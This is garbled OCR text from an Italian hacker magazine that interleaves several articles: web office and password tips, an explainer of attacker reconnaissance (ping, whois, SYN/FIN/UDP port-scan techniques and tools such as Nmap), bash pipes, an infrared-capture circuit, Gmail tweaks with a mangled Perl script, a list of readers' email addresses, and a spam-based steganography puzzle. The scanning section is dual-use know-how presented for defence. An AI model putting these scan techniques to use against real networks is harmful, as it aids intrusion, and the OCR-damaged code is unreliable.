Francamente: c’è l’imbarazzo della 
scelta, ma l'unico sistema nato sul 
Web e che funziona bene apposta per 
il Web si chiama Gmail e punto. Gli altri 
sistemi sono tutti bellissimi, ma stanno un 
gradino più sotto rispetto a quello propo¬ 
sto e. soprattutto, la loro casella non cre¬ 
sce in continuazione, un elemento per noi 
molto importante. Gmail è partito a due gi¬ 
ga per casella, ora sono 2,8... 


:: Word processing e fogli 
di calcolo 


Nessuno avrebbe mai pensato di po¬ 
ter scrivere documenti o gestire fo¬ 
gli di calcolo dentro un browser. In¬ 
vece si può! Manco a dirlo, l’offerta mi¬ 
gliore ce l’ha Google, che oltre al No¬ 
tebook ha anche Google Docs (http:// 
docs.google.com), con un vero word 
processor e un vero foglio di calcolo. 
Non è che facciano tutto quello che fa 
Open Office, ma per non lasciare trac¬ 
cia sui nostri computer vanno strabene. 
In più c’è il vantaggio che sono ideali 
anche per agire in senso inverso, ossia 
creare un documento a dare la possibi¬ 
lità di lavorarlo a tutti i nostri amici o col¬ 
leghi o parenti o crew. Non dimentichia¬ 
mo neanche le alternative: per esempio 
Zoho (http://www.zoho.com/) o Think- 
Free online, in beta all'indirizzo http:// 
www.thinkfree.com/common/main.tfo. 

Dare spiegazioni è abbastanza inutile. 
Bisogna essere registrati e poi è que¬ 
stione di cominciare a scrivere, o calco¬ 
lare! L’importante è che sappiamo che 
quei dati non staranno mai dentro il no¬ 
stro computer, pur essendo raggiungi¬ 
bili in qualsiasi momento (purché ci sia 
Internet, chiaro). 

:: Consigli di sicurezza 
generali 

Una nota di una certa rilevanza: tut¬ 
to quello che abbiamo detto funzio¬ 
na se facciamo la giusta attenzio¬ 
ne alla password. Lo abbiamo detto 
milioni di volte. Deve essere una pas¬ 
sword semplice da ricordare ma difficile 
da indovinare, lunga almeno otto carat¬ 
teri, con lettere ma anche numeri e, se 
possibile, maiuscole, minuscole, segni 
di interpunzione e simboli insoliti. 1234 
è una password tremenda; Q3IMp5555 
(Questa È La Mia Password SuperSe- 
gretiSSima) è una ottima password (lo 
era, in realtà; adesso l’hanno vista tut¬ 
ti!). Due"3F#Sei! è una password me¬ 
ravigliosa (non tutti i sistemi però la ac¬ 
cetteranno). 

La password non deve averla n-e-s-s- 
u-n-o all’infuori di noi. Altrimenti è già 
morta. Cambiamola ogni tanto. Se non 


ogni settimana, almeno ogni mese. Di¬ 
pende anche dalle nostre necessità di 
sicurezza reali. Più la password è buo¬ 
na, più possiamo mantenerla. 

Attenzione alle cache del browser e ai 
cookie. Quando lasciamo il computer 
incustodito, se il browser inserisce la 
nostra password in automatico, siamo 
fregati. Dobbiamo essere pazienti; eli¬ 
minare cookie e cronologia quando il 
computer è a rischio e noi siamo as¬ 
senti. La password deve essere sem¬ 
pre inserita manualmente, mai in au¬ 
tomatico. 

Ricordiamo che la protezione definitiva 
è sempre una cifratura forte. Se i dati 
che mettiamo online sono cifrati, (mol¬ 
to) meglio ancora. 



A Zoho è un concorrente assai credibile di 
Google Docs! 


Ultimo consiglio: attenzione ai keylog- 
ger e al resto dello spyware. Inutile ave¬ 
re i documenti confidenziali su Google, 
se spiano il nostro traffico dati. Ah, fos¬ 
simo in noi, per usare questi servizi, ci 
affideremmo a Firefox. Internet Explo¬ 
rer è profondamente insicuro. Usiamo¬ 
lo con grande attenzione. 

E ora sotto. Se abbiamo qualcosa da 
tenere al sicuro... la strada giusta è 
online. 


Barg thè Gnoll 
bargthegnoll@gmail. com 



S u Windows e Mac OS X l’interfaccia¬ 
mento ai dischi virtuali in protocol¬ 
lo WebDAV è una cosa naturale. Ma Li¬ 
nux non è da meno: il progetto da segui¬ 
re si trova alla pagina http://dav.sf.net/. 
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do momento, controllare che effettiva¬ 
mente quell'IP sia attivo quando piani¬ 
fico l'attacco. Per effettuare queste due 
operazioni si sfrutta un unico servizio, 
noto col nome di PING. Il PING è l’invio 
di una richiesta ICMP di tipo echo a cui 
il computer soggetto reagisce inviando 
un un pacchetto di tipo PONG. Questo 
pacchetto contiene anche l'indirizzo IP 
del PC stesso. 

Il social engineering è stato, fin dagli al¬ 
bori della cultura hacker, il metodo più 
utilizzato per carpire informazioni. Ne 
abbiamo parlato in abbondanza, è co¬ 
stituito dalle capacità personali di ren¬ 
dersi credibile nei confronti di terzi, e 
sfruttare la fiducia - o l'ignoranza - per 
acquisire privilegi o sottrarre dati utili a 
un’aggressione. 


B sistono vari tipi di attacchi te¬ 
lematici a dei siti, lo sappiamo 
bene. Ma quando si ha a che fare 
con un’incursione vera e propria 
lo scenario iniziale appartiene a una ti¬ 
pologia che solo raramente cambia. Im¬ 
pariamo a capire come agisce chi attac¬ 
ca e potremo difenderci con maggior ef¬ 
ficacia. Abbiamo un sistema operativo 

I che gestisce il funzionamento di uno o 
più computer che erogano alcuni servizi 
che traggono origine da un server: sarà 
questo server l’obiettivo dell’attacco ve¬ 
ro e proprio. Come raccolgono queste 
informazioni? Esistono molti strumenti, 
modi e tecniche. La scansione dei pun¬ 
ti deboli è utilizzata già da molti anni e 
si basa sempre su di un concetto ben 
preciso: interrogare il maggior 
numero di porte per trovare 
quelle ricettive a possibi- 
li attacchi. 


Vediamo come funziona. Cercare 
una specifica rete può risultare ab¬ 
bastanza difficile, perché le reti stes¬ 
se sono moltissime. Whois può da¬ 
re una mano. Si tratta di un servizio In¬ 
ternet che, a partire da un account su 
un dominio specifico, consente di recu¬ 
perare molte informazioni quali URL o 
utenti collegati ad esso. InterNIC è uno 
degli enti più noti per questo tipo di ap¬ 
plicazioni: è l’organo deputato all’attri¬ 
buzione dei nomi di dominio e degli in¬ 
dirizzi IP. Partendo da un dominio ed 
un URL si dovrà usare per forza un al¬ 
tro strumento che permet¬ 
ta di invertire il for- 
mato alfa- 
W numeri- 

^ Al 00 mne " 

B monico 

. etiti J nell’indi- 

• ^ rizzo IP 

associato 
e, in un secon- 


► Controllo da lontano, 
perlustrazione, raccolta di 
informazioni: sono il segreto per 
un attacco efficace 


Gli attacchi di tipo scanning, al con 
trario, sono basati su pura tecnica 
o meglio, su pura tecnologia. Si uti 
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il più utilizzato. 

Scansione delle porte TCP a fram¬ 
mentazione - Stessa tecnica con la 
differenza che l’header TCP viene di¬ 
viso in pacchetti più piccoli, cosicché i 
filtri di protezione non riescano ad indi¬ 
viduare l'attacco. 

Scansione SYN TCP - Si basa sull’in¬ 
vio di un pacchetto SYN come per apri¬ 
re una connessione; se il PC risponde 
con una richiesta SYN/ACK il nostro 
programma manda immediatamente 
una risposta RST e chiude così la pro¬ 
cedura. Ha il vantaggio di essere quasi 
invisibile e lo svantaggio di essere mol¬ 
to più lenta della precedente. 
Scansione TCP FIN - Si tratta di una 
tecnica estremamente raffinata che si 
basa sul principio che spesso le por¬ 
te aperte che ricevono pacchetti FIN ri¬ 
spondono con pacchetti RST facendo¬ 
si cosi individuare. 

Scansione UDP ICMP - Come sap¬ 
piamo il protocollo UDP non prevede 
scambio di pacchetti ACK o RST, ma 
la maggior parte degli host se riceve 
un pacchetto indirizzato ad una porta 
UDP chiusa risponde con un messag¬ 
gio di errore; per esclusione si risale al¬ 
le porte aperte. 


lizzano strumenti il cui principio di fun¬ 
zionamento sta nell’inviare pacchetti su 
determinate porte e vedere quali di es¬ 
se sono recettive. Esistono molte va¬ 
rianti di questa tecnica. 



Hottf») 
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A Libero e pronto a essere usato, Nmap è 
un ottimo programma di pori-scanning. 


:: Gli strumenti 

In rete possiamo trovare una gran 
quantità di programmi di scanner, 
tutti basati sugli stessi principi e le 
stesse tipologie di funzionamento. 
Eccone alcuni... 

- Symantec NetRecon: valido in ambi¬ 
to Windows, analizza la rete e scopre i 
suoi varchi, raggruppando i dati raccolti 
in un report. Agisce simulando vari tipi 
di attacchi esterni e consigliando come 
“tappare” eventuali buchi riscontrati. 

- Nai CyberCop: funziona sia su Linux 
che su Windows; valuta i punti deboli di 
un sistema facendo la scansione di es¬ 
so. Riesce anche ad analizzare proble¬ 
mi di sicurezza legati a server ed hub. 
Integra inoltre una funzione per cui si 
autoaggiorna da internet scaricando il 
database dei punti deboli. 


Scansione delle porte TCP - Si invia¬ 
no dei pacchetti e si cerca di stabilire 
una comunicazione con quella deter¬ 
minata porta; il metodo più semplice e 


- Nmap (www.insecure. org/nmap): 
scanner molto completo che ha la pos¬ 
sibilità di lavorare in più modi a secon¬ 
da della situazione; a volte usa meto¬ 


dologie invisibili, a volte metodologie 
rapide. Incorpora tutte le metodologie 
di scanning note. 



A Dal sito www. tigertools. net possiamo 
scaricare la Viger suite: torse il miglior 
prodotto per la sicurezza delle 
comunicazioni in rete 


- Tiger suite (www.tigertools. net): è 

considerato il miglior strumento per la 
sicurezza delle comunicazioni fra reti. 
La sua velocità non ha pari con gli al¬ 
tri scanner ed inoltre è l’unico che in¬ 
tegri anche le seguenti caratteristiche: 
network discovery (identifica ed elen¬ 
ca tutti i punti deboli di una rete), locai 
analyzer (scannerizza il sistema locale 
individuando tra le altre cose anche vi¬ 
rus, trojan e spyware), attack tools ( set 
di strumenti che collaudano la sicurez¬ 
za di un sistema simulando attacchi di 
varia natura). 

- Jackal: è uno scanner Stealth (na¬ 
scosto) basato sul principio di funzio¬ 
namento di tipo SYN TCP 





A Un controllo dei vettori d'attacco è 
importante... Non serve usare un Awacs, 
ci basta controllare le porte 


:t E POiP 

Una volta effettuata la scansione si 
potrà avere sott'occhio una serie di 
porte aperte. Dipenderà ora dall'ag¬ 
gressore scegliere cosa fare di queste 
informazioni e quali strumenti utilizza¬ 
re... Ma questa è un’altra storia. ■ 
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testo!). Ora però passiamo all’argomen- Mostra un elenco di directory e lo spa¬ 
to di cui non si può proprio fare a meno: zio da esse occupato, andando (gra- 
i pipe! E se qualcuno ridacchia, smet- zie a sort) dalla più grossa alla più 
ta subito, che sono una persone seria! piccola. 

(bè, insomma, dipende) 

Se prima, con la ridirezione, cambia¬ 
vamo la destinazione dello standard 
output, o la fonte dello standard input, 
che di solito sono ambedue lo scher¬ 
mo, con un pipe prendiamo l’output di 
un comando e lo diamo in pasto a un 
altro comando, come input. Il pipe si 
indica con la barra verticale, I. Su cer 
te tastiere a volte si vedono due mez 
ze barre una sull'altra, ma è lo stesso 
Sulla mia tastiera il pipe si trova insie 
me al backslash, \. Ecco alcuni esem 
pi di pipe: 


che 

permette di cambiare la direzione del¬ 
l’output dallo schermo a un file (ma an¬ 
che in altri frangenti), come in 


Che, invece di mostrare sullo schermo 
i contenuti di file.txt, li salva in altrofile. 
txt. Esiste anche l'inverso, per esem¬ 
pio il comando 


W indows ha la sua Shell, ma bash 
(la base dei nostri esempi) è me¬ 
glio. Si può installare bash su Windows, 
però. Serve l’ambiente Unix Cygwin. ht- 
tp://sources. redhat.com/cygwin/. Va in¬ 
stallato Cygwin, per poi installare bash 
(lo troviamo per esempio su http://har- 
dclicker.com/35TMFU). Se usiamo Linux 
o Mac OS X. o un qualsiasi altro sistema 
Unix-based, siamo già a cavallo! 


che prende in input il contenuto del file 

ed esegue il comando. In questo caso, ls -lt | head 

sort ordina il contenuto del file. 

Mostra i dieci file più recenti nella di- 
Queste cose andavano ripetute, anche rectory di lavoro, ls fa l’elenco, head 
se già dette in Hacker Journal 111 (chi prende i primi dieci dall'elenco di ls. 
lo abbia perso mi scriva e gli mando il du | sort -nr 
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Mostra il numero di file totali nella di¬ 
rectory di lavoro e tutte le sue subdi¬ 
rectory. Da studiare bene, è un esem¬ 
pio interessante, f ind e wc servono in 
un sacco di occasioni. 


TRUCCO: GUARDARE 
DENTRO I FILE TAR 


pipe tornano utili, ad esempio per spiare dentro un file compresso e vedere quali 
file e directory lo compongono. Basta il comando giusto: 


Provare per credere! 


Volevo 

solo spiegare che i pipe si usano spesso 
insieme ai filtri della shell. Un filtro prende 
lo standard input, effettua sull’input una 
operazione e manda il risultato allo stan¬ 
dard output. Con i filtri giusti si possono ot¬ 
tenere risultati davvero ottimi. Ecco alcuni 
dei comandi usati più spesso come filtri. 


fine riga per trasformare un file DOS in 
un file Unix e viceversa, oppure per si¬ 
stemare le accentate passando da Mac 
a DOS e così via. Merita uno studio ac¬ 
curato (con man tr). 

È uno stream editor. Molto in 
breve, effettua trasformazioni molto più 
complesse di quelle di tr. Va studiato; ci 
si può scrivere un libro... 

Un linguaggio di programma¬ 
zione fatto per costruire altri filtri di que¬ 
sto tipo. Più potente di cosi si muore! 
Anche questo potrebbe riempire centi¬ 
naia di pagine e ancora non avrei finito 
di spiegarlo. Neanch’io lo conosco tut¬ 
to, a essere onesta! 


tentissimo! 

Legge il testo dallo standard 
input e lo manda in output in maniera 
ordinata e semplice da leggere. 

Prende lo standard input e lo 
divide in pagine, con tanto di intesta¬ 
zioni e piè di pagina, per la stampa su 
carta o su file PDF, per esempio. 

Mostra le prime righe dell’input 
(vuol dire testa). 

Mostra le ultime righe dell’input 
(vuol dire coda). 

Trasforma caratteri. Può esse¬ 
re usato, per esempio, per trasforma¬ 
re minuscole in maiuscole e viceversa. 
Oppure agire sui caratteri di controllo di 


Ordina lo standard input e lo pas¬ 
sa allo standard output. 

Toglie le righe doppie dallo stan¬ 
dard input e fa in modo che ogni riga com¬ 
paia solo una volta. 

Esamina lo standard input e 
manda in output solo quello che corri¬ 
sponde a una sequenza di caratteri che 
vogliamo. In gergo, applica una espres¬ 
sione regolare allo standard input. E po- 


in modo abbastanza semplice. 

Di seguito pubblichiamo un esempio in¬ 
teressante di quanto abbiamo detto. Gli 
elementi degni di nota sono presenti su¬ 
bito a destra della voce "disordinato.txt". 
Subito dopo questo primo esempio pren- 
Questo perché in tal modo ab- deremo in considerazione qualcosa di 
biamo la possibilità di studiare la tecnica più articolato. 


ANCHE in 

ITALIANO 


S tudiare in inglese è difficile, lo so. 

Per quanto sia raccomandabile, per¬ 
ché un vero hacker un po’ di inglese lo 
sa, ecco un paio di siti dove è possibile 
informarsi su bash nella nostra lingua: 
http://xmau.com/articoli/bash.html e ht- 
tp://snipurl.com/w902. 


Osserviamo bene quanto abbiamo appe- più ordinato (f mt). diviso in pagine (pr) e 
na scritto: 'unico comando nuovo è lpr, infine mandato in stampa (lpr). Tutto av- 
che governa l’invio dei file alla stampante, viene ordinatamente e per tempi, si trat- 
II resto lo abbiamo già visto e possiamo ta di uno strumento abbastanza sempli- 
capire perfettamente che cosa succede ce da imparare, ma che può considere- 
man mano che il comando viene consi- volmente agevolare il compito di chi deve 
derato: il testo viene rielaborato in modo eseguire delle operazioni. Osserviamo: 


cat elenco _ non _ ordinato _ con _ doppioni.txt 


umq 


La situazione non cambia, ma si evolve, dine e pronto per essere presentato 
Prima di andare in stampa, l’elenco viene 
ordinato e ripulito dai doppioni. E a quel 
punto il lavoro è completato: tutto è in or- 
















I nostro PC ha delle possibili¬ 
tà nascoste. La scheda audio 
con un buon programma Open 
Source di acquisizione dei se¬ 
gnali può farci vedere (e ascoltare! 
cose incredibi 


L’idea è questa: se colleghiamo all'in¬ 
gresso del microfono del nostro com¬ 
puter un piccolo circuito sensibile alle 
variazioni della luce, possiamo letteral¬ 
mente vedere e ascoltare dei fenome¬ 
ni che a occhio nudo ci sfuggono com 


pletamente. 

Per esempio: cosa esce dai telecoman¬ 
di a raggi infrarossi dei televisori e dei 
videoregistratori? Cosa cambia schiac¬ 
ciando il tasto del volume piuttosto che 
quello dei programmi? Oppure: quan¬ 
to tempo resta acceso il flash della no¬ 
stra macchina fotografica? Sullo scher¬ 
mo del nostro computer avremo tutte 
le risposte, in modo facile e divertente. 


-1 condensatore elettrolitico da 4,7 mi- 
croF, 16 V (opzionale); 

- 4 pile A A da 1,5 V o una pila da 9 V; 

- portapile, cavetti di collegamento, jack 
per l’ingresso alla scheda audio. 






/J: 
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semplice che funziona al primo colpo. 
Quale fototransistor abbiamo usato? 

Non chiedetecelo: l'avevamo in un 
cassetto, non lo sappiamo nemmeno noi! 

torsoli?wrrìi# :; n r 


L’occorrente 


Quello che ci serve realizzare è un 
semplice circuito che sia sensìbile 
alla luce visibile, alla luce infraros¬ 
sa o a tutte e due... 


Dopodiché lo colleghiamo all’ingresso 
della scheda audio con un semplice ca¬ 
vetto e il gioco è fatto. 

I pezzi utili sono: 

- 1 fototransistor NPN (o un fotodiodo) 
di qualunque tipo; 

-1 resistenza da 1000 ohm, 'A W; 

-1 resistenza da 4,7 Kohm, 'A W; 

-1 resistenza da 100 ohm, 1 A W; 


e 


ìck in uscita dal nostro circuito. 
Con Audacity misuriamo la luce! 


Il fototransistor può essere generico o 
specifico per registrare solamente la lu¬ 
ce infrarossa. 

Possiamo montare tutto in modo vo¬ 
lante, perché i pezzi sono veramente 
pochi. Se proprio vogliamo fare le co¬ 
se benissimo, usiamo una basetta mil- 
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lefori in cui inseriamo i terminali dei di¬ 
versi componenti. Seguendo lo sche¬ 
ma, saldiamo i componenti tra loro e 
colleghiamo il cavetto di alimentazio¬ 
ne per la batteria e il cavetto verso la 
scheda audio. Per questo possiamo ac¬ 
quistare un economico cavo che abbia 
da una parte la spina jack microfonica 
adatta all’ingresso della nostra scheda 
audio, quindi tagliarlo in modo da colle- 
gare i due fili di un canale all'uscita del 
nostro circuito. 


ugnale? solo aliai 
perché basta amplificare... 


:: L’acquisizione 


L'applicazione che abbiamo usato 
per acquisire il segnale è Audacity 
(audacity.sourceforge.net), un pro¬ 
gramma OpenSource estremamen¬ 
te potente. 


Attacchiamo il cavetto in uscita dal no 
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stro circuito all’ingresso del microfono 
della scheda audio. 


▲Amplificando ecco che appaiono i tre rii 
di impulsi che abbiamo sparalo al 
fototransistor. Li possiamo ascoltare! 


Procuriamoci ora un telecomando a in¬ 
frarossi della televisione o di un'altra 
apparecchiatura che abbiamo in casa. 
Attiviamo la registrazione su Audaci¬ 
ty e premiamo un pulsante del teleco¬ 
mando, per esempio quello del volume, 
che emette in continuazione dei treni di 
impulsi. Dirigiamo il fascio di infrarossi 
verso il fototransistor. 

Se il circuito funziona ed è ben collega¬ 
to, dovremmo vedere su Audacity il mo¬ 
nitor del volume in ingresso che segue 
il segnale, muovendosi. 
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Schema 

bizzarro 


A bbiamo segnalato nell'elenco dei 
componenti e nello schema un con¬ 
densatore elettrolitico da 4,7 microFa- 
rad, adatto alla tensione che usiamo. 

Lo dobbiamo inserire solamente se pro¬ 
prio abbiamo dei problemi di disturbi. In 
particolare, siccome abbiamo montato il 
circuito volante, senza usare cavi scher¬ 
mati e, soprattutto, abbiamo recuperato 
un fototransistor che è sensibile anche 
alla luce visibile, c'è un rumore di fondo 
formato da una ondulazione che si ripete 
50 volte al secondo. Stiamo captando la 
frequenza della rete elettrica, che fa ac¬ 
cendere le lampadine ed emette disturbi 
proprio a 50 Hz. 

Il condensatore fa da filtro: elimina la 
frequenza fastidiosa. L’inconveniente è 
che arrotonda anche i picchi che stia¬ 
mo osservando, rendendo il segnale me¬ 
no netto’. 

Un'altra attenzione che dovremo avere 
è il collegamento alla scheda del pc. Sa¬ 
rà molto meno disturbato e più sensibi¬ 
le se uniremo la massa del nostro circui¬ 
to alla massa della scheda audio. Men¬ 
tre l'uscita del segnale all’ingresso 'cal¬ 
do' della scheda audio, quello centrale, 
nel connettore jack. 


mmmpjwmhnmo a piacimento; 
per veder meglio cosa succede. ■ _ m 
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con attenzione possiamo portare a 
termine il nostro esperimento. 










































































































regolato per alzare il volume dal 
videoregistratore. 
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I raggi infrarossi sono il frutto di una radiazione elettromagnetica con una lunghez¬ 
za d'onda più maggiore di quella della luce normalmente considerata “visibile”. Il 

nome significa “al di sotto del resso” in quanto il rosso è il colore della luce visibile con 
la maggior lunghezza d’onda. 

La radiazione infrarossa comprende tre ordini di grandezza e le sue lunghezze d’onda si 
collocano approssimativamente tra i 750°nm e 1°mm. 

La porzione infrarossa dello spettro ha un gran numero di utilizzi in campo tecnologi¬ 
co, a partire dall’acquisizione e inseguimento dei bersagli in ambito militare al control¬ 
lo via remoto della tempertatura, senza dimenticare il collegamento a corta distanza di 
dispositivi wireless. I telescopi equipaggiati con sensori a infrarossi vengono utilizza¬ 
ti in astronomia a infrarossi per penetrare le regioni di spazio caratterizzate da presen¬ 
za di nubi di pulviscolo o per rilevare oggetti a bassa temperatura, come pianeti in or¬ 
bita intorno a stelle distanti. 

A livello atomico l’energia infrarossa suscita modalità di vibrazioni in una molecola, tra¬ 
mite le variazione del momento del dipolo, rendendo il processo utile per lo studio del¬ 
le variazioni di frequenza degli stati di energia. La spettroscopia a infrarossi è l’esame 
dell'assorbimento e della trasmissione dei fotoni nella gamma dell’energia infrarossa, 
basata sulla loro frequenza e intensità. 
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te e ampliamo anche in altezza la fine¬ 
stra di Audacity così da poterli osser¬ 
vare bene. 
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Un po' di mìsu 


Confrontando i segnali possiamo 
anche capire come sono fatti e qua¬ 
li differenze ci sono tra un coman¬ 
do e l’altro. 


Come esperimento non è male. Richie¬ 
de non molta tecnica e solo un po' di 
tempo e fatica, il risultato, comunque è 
interessante. Audacity ci indica la du¬ 
rata del segnale selezionato sulla bar¬ 
ra presente nella parte inferiore della 
schermata. 

Noi, per esempio, abbiamo usato un 
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▲ Per comodità possiamo riprodurre su un 
foglio di carta quadrettata te registrazioni 
che vediamo a video, per renderci meglio 
conto di come sono disposti i bit. Il codice 
Philips si chiama RC5 e funziona sempre 
allo stesso modo. Cambiano però le 
wenze di bit. secondo il tasto che 
abbiamo premuto. 


»i 


« > 
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vecchio telecomando Philips ma, ov¬ 
viamente, si può ricorrere ad altre so¬ 
luzioni. 

Selezionando con il mouse i diversi 
pezzi leggiamo quanto tempo durano: 
questione di millisecondi! Ma la nostra 
scheda li cattura e li misura tutti: 

- un bit (da un fronte in discesa al suc¬ 
cessivo) dura circa 1,8 millesimi di se¬ 
condo; 

- il blocco completo di bit che rappre¬ 
senta un tasto dura circa 24,5 millise¬ 
condi; 

- tra un blocco e l’altro passano circa 
100 millesimi di secondo, quindi si ri¬ 
petono fino a che teniamo premuto il 
tasto; 

- il numero di bit trasmessi in ogni bloc¬ 
co è sempre uguale, ma la sequenza 

varia secondo 
l’apparecchio 
che deve esse¬ 
re telecoman¬ 
dato e secon¬ 
do il comando 
che si invia. 


( Esplorati tut¬ 
ti i telecoman¬ 
di che abbiamo 
in casa, possia¬ 
mo passare ad 
altre fonti di lu¬ 
ce: il flash della macchina fotografica, 


l’accendigas... 

Sarà divertente vedere come sono fat¬ 
te le forme d'onda emesse dalla luce di 
ciascun dispositivo. Coloro che poi so¬ 
no dotati di maggior inventiva potreb¬ 
bero anche provare a combinare quan¬ 
to scritto in queste pagine con le dritte 
che abbiamo dato in HJ109. 

Buon divertimento! 


c a 




RC5 E CODICI', 


I INFRAROSSI \ 

I l sistema di codifica RC5 adottato da 
Philips è descritto brevemente qui: 
http://www.armory.com/-spcecdl/ 
remote/RC5codes.html 

Noteremo che nei nostri schemi i bit van¬ 
no letti in logica opposta: dove c’è scrit¬ 
to 1 intendiamo 0 e viceversa. Dipende 
da come si inizia a leggere il segnale. Per 
esempio: il codice del volume + in deci¬ 
male è 16, in binario è quindi 010000. 
Sullo schema che abbiamo rilevato a vi¬ 
deo abbiamo scritto 101111.1 bit com¬ 
plementari. Dipende solo da come ini¬ 
ziamo a leggere le transizioni del segna¬ 
le (da 1 a 0 o da 0 a 1). 


INFRAROSSI per tutti V- 


















































































































L I errore è sempre in agguato, l’orrore ci aspetta dietro 
y l’angolo. Stephen King? No... il nostro disco rigido 
e la sua raccolta di giga e giga di prezioso software. 
Prezioso e, parlando di messaggi di errore, fin trop¬ 
po divertente. Procediamo subito ad ammirare i protagonisti 
di questo numero! 


► Per aiutare a proteggere il compu¬ 
ter. Windows ha chiuso il programma 
che scarica gli aggiornamenti di si¬ 
curezza. Qualcosa, nella logica, non 
quadra. La logica di programmazio¬ 
ne, diremmo! 



<La finestra è busy. Im- 

ProQrtss 

pegnata. Impegnata con 

C*p«r>òc*ig -rV,r>«J*rt»oll>_OM.l»JfC- lo -ThumWrboUi' 

I chi? A pranzo o a cena? 

Tww r«m*J!*i*« Atout ÌOIUOélì* tauri 

I Se chiudiamo questa fi- 

norfro nnirommn 

Staff If & 


◄ è proprio vero che per tare be¬ 
ne le cose ci vuole un (bel) po' di 
tempo. Specie con Stufili su Mac 
OS X; il programma ideala da la- 




sare problemi. Forse le 
altre migliaia dietro si 
offenderanno? 


► Con l'informatica si può fare tutto, 
anche tornare indietro nel tempo, magari 
prima della nascita di Cristo (BC = Before 
Christ, prima di Cristo). Un solo, piccolo, 
leggerissimo problemino: come ben sa chi 
abbia praticato un po 1 di programmazione 
di calendari, quella casella BC darà un ri¬ 
sultato assurdo non appena faremo qualche conto sulle date 
partendo da quel valore. Ma che cosa importa un calcolo 
del cavolo, di fronte a una meravigliosa opzione in più? 


▼ Guerra fratricida? Il messaggio notifica che il Service Pack 2 va 
chiuso prima di proseguire l'installazione. Chi indovina quale in¬ 
stallazione stiamo ese¬ 
guendo? Esatto, proprio 
il Service Pack 2. Non era 
facile. A volte, non lo è 
nemmeno installare un 
Service Pack! 


n»n w 


FoundMr*» Htiéwut 


► Purtroppo è andato tutto be¬ 
ne. L'operazione si è conclu¬ 
sa con successo, ma il messag¬ 
gio (lo dice quella grossa X ros¬ 
sa) è un messaggio di errore. 
Che software house sarà? Sem¬ 
bra quella di House, il dottore di 
Italia Uno! 


Windows needs to instali driver software for your Mass 
Storage Controller 


Nicola D'Agostino 
http://www. nicoladagostino. net 








IN ATTESA 
DEU ERRORE 


IV 


in.t.«lUIlori I noi 



A spettiamo sempre orrori ed errori informatici da tutti i let 
tori! Scrivere a gnoll@hackerjournal.it. :-) __ 
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HM) HACKING 


I 


Sulla seia Sei successo Si onesto sistema, 
nasce la commuoity Sì Hacker Journal! 


|^^|on è la prima volta che tra- 
* I paniamo la crosta di Gmail 
L I per scoprirne qualche segre- 
LLJ to. Andiamo avanti e scopriamo 
che c’è modo di ottenere altri account 
Gmail. Gmail vive grazie alla pubblici¬ 
tà e Google riesce a fare pubblicità che 
disturba il minimo indispensabile. Tutta¬ 
via qualcuno potrebbe volere eliminare 
la pubblicità per motivi di principio. 

La pubblicità si trova dentro una div 
chiamata ad. Il codice qui sotto la elimi¬ 
na. A nostro rischio, naturalmente: 


/* Adverts 7 

body#gmail-gooqle*com div#ad { 
display: none limportant; 


:: Esportiamo! 


Come si esporta la posta di Gmail 
sotto forma di un unico file di 
testo?Non è una cosa molto pratica, 
per esempio, per importare la stes¬ 
sa posta in un altro programma, ma 
per esempio consente di fare ricerche 
sul testo piuttosto facilmente, o salva¬ 
re tutto su un DVD a scopo di backup 
permanente. Il codice (Perl) è qui in al¬ 
tro a destra. 

Ci rivediamo alla prossima. 

Barg thè Gnoll 
gnoll@hackerjournal. it 


use Utils; 

Sgmail = login(); 

Smessages = Sgmail->get_messages(); 
open OUTPUT, “>archiviomail.txt”; 
foreach (@{$messages}) { 

my $full_message = $gmail->get_indv_email(msg => Smessage); 

....print OUTPUT “Da: “ . $fulljnessaqe->{$id}*>i'‘sender_emaif} . “\n”; 

....print OUTPUT “Data: “ . $fulljnessage*>{$id}->{‘‘senO . “\n"; 

....print OUTPUT “Oggetto: “ . strip_bold(Sfull_message->($id}->{“subject”}) . “\n\n"; 
....print OUTPUT $full_message->{$id}->{'‘body M } . “\n\n"—An"; 

} — 

dose OUTPUT; 


COttUNITY GNAU 


Qualcuno ci ha offerto una mano, altri hanno messo a disposizione inviti. Abbiamo chie¬ 
sto il permesso di pubblicarli sulla rivista ed ecco la nostra community... 

Regole del gioco 

1) onestà. Non si chiede un invito dopo averne già ricevuto uno. 

2) gentilezza. Chi regala un invito lo fa per buona volontà. 

3) comprensione. Qualcuno ha pochi inviti e comunque nessuno ne ha infiniti. 

4) discrezione. Gli indirizzi qui sotto servono a chiedere un invito, non a rompere ;-) 

Ecco l’elenco. Chi volesse mettersi a disposizione per regalare inviti ai lettori di hacker 
Journal, scriva pure a gnoll@hackerjournal.it! 

Mattia Bozzato <mattbozz3@gmail.com> -10 inviti 
Alex <deliveryboy81@gmail.com> - indefiniti 
Fulgidus - alessio.corsi@gmail.com -100 disponibili 
Claudio - <marker.topnet@gmail.com> - indefiniti 
Axlwar <axlwar@gmail.com> - indefiniti 
<enetweb@gmail.com> - 50 inviti 
<fox1991@gmail.com> - indefiniti 
<neo_matrix2@libero.it> 
bailopas <bailopas@alice.it> 
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I e Addizioni Binarie Annunciano 
Tritemio E Completano Ogni Lu¬ 
dico Problema Intrinsecamen¬ 
te Steganografico. Chiamiamola 
Eventualmente Attitudine, Non Caso. 
Oppure Resteremo Analfabeti (questo 
è l’enigma per tutti!) 

Per esperti: Tritemio creava liste di pa¬ 
role. Ogni parola corrispondeva a una 
lettera. Con una lista di 26 soggetti, 26 
verbi e 26 oggetti si possono creare fra¬ 
si che nascondono messaggi. La frase 
è la seguente: 

Dear E-Commerce professional ; This 
letter was specially selected to be sent 
to you . This is a one time mailing the- 
re is no need to request removai if you 
won't want any more ! This mail is being 
sent in compliance with Senate bill 1624 




l AIUTINO 

GENERALE 


U no degli scorsi numeri di Hacker 
Journal potrebbe essere determi¬ 
nante per risolvere l'enigma. È l'unico 
numero finora pubblicato in cui le pri¬ 
me due cifre danno come somma la ter¬ 
za cifra. Se qualcuno capisce che nume¬ 
ro è ma (cattiveria!) se lo è perso, scri¬ 
vere a gnoll@hackerjournal.it forse potrà 
bastare a lavare l'onta e a farsi spedire il 
testo dell'articolo... 


, Title 2 ; Section 303 . This is different 
than anything else you’ve seen ! Why 
work for somebody else when you can 
become rich within 53 MONTHS . Have 
you ever noticed nobody is getting any 
younger and how many people you 
know are on thè Internet. Well, now is 
your chance to capitalize on this . We 
will help you SELL MORE and increase 
customer response by 110% . You can 
begin at absolutely no cost to you . But 
don’t believe us . Mrs Jones who resi- 
des in Florida tried us and says “Now 
l’m rich many more things are possible” 
! This offer is 100% legai ! We BESEE- 
